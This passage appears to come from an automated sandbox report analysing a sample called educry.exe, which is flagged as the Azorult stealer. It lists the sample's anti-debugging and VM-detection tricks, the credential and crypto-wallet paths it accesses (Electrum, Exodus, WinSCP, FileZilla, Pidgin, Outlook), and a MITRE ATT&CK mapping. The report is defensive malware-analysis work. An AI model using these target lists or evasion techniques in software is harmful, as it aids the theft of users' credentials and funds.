IXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: bWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
            Source: educry.exe, 00000001.00000003.262106055.000000001E064000.00000004.00000001.sdmpBinary or memory string: KLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZURZU<F
            Source: C:\Users\user\Desktop\educry.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging:

            barindex
            Contains functionality to hide a thread from the debuggerShow sources
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A020C NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,000000000_2_023A020C
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\educry.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\educry.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\educry.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A323D rdtsc 0_2_023A323D
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A1A7C mov eax, dword ptr fs:[00000030h]0_2_023A1A7C
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A1267 mov eax, dword ptr fs:[00000030h]0_2_023A1267
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3458 mov eax, dword ptr fs:[00000030h]0_2_023A3458
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3047 mov eax, dword ptr fs:[00000030h]0_2_023A3047
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A1291 mov eax, dword ptr fs:[00000030h]0_2_023A1291
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A34DE mov eax, dword ptr fs:[00000030h]0_2_023A34DE
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3538 mov eax, dword ptr fs:[00000030h]0_2_023A3538
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A0D14 mov eax, dword ptr fs:[00000030h]0_2_023A0D14
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A2D64 mov eax, dword ptr fs:[00000030h]0_2_023A2D64
            Source: C:\Users\user\Desktop\educry.exeProcess created: C:\Users\user\Desktop\educry.exe 'C:\Users\user\Desktop\educry.exe' Jump to behavior
            Source: C:\Users\user\Desktop\educry.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\Desktop\educry.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AzorultShow sources
            Source: Yara matchFile source: 00000001.00000003.260334364.000000001E06C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: educry.exe PID: 6624, type: MEMORY
            Found many strings related to Crypto-Wallets (likely being stolen)Show sources
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Exodus\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Exodus\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\educry.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Users\user\Desktop\educry.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
            Tries to steal Instant Messenger accounts or passwordsShow sources
            Source: C:\Users\user\Desktop\educry.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Users\user\Desktop\educry.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection11Virtualization/Sandbox Evasion22OS Credential Dumping1Security Software Discovery521Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11Credentials in Registry2Virtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Credentials In Files1Process Discovery11SMB/Windows Admin SharesData from Local System2Automated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery123SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi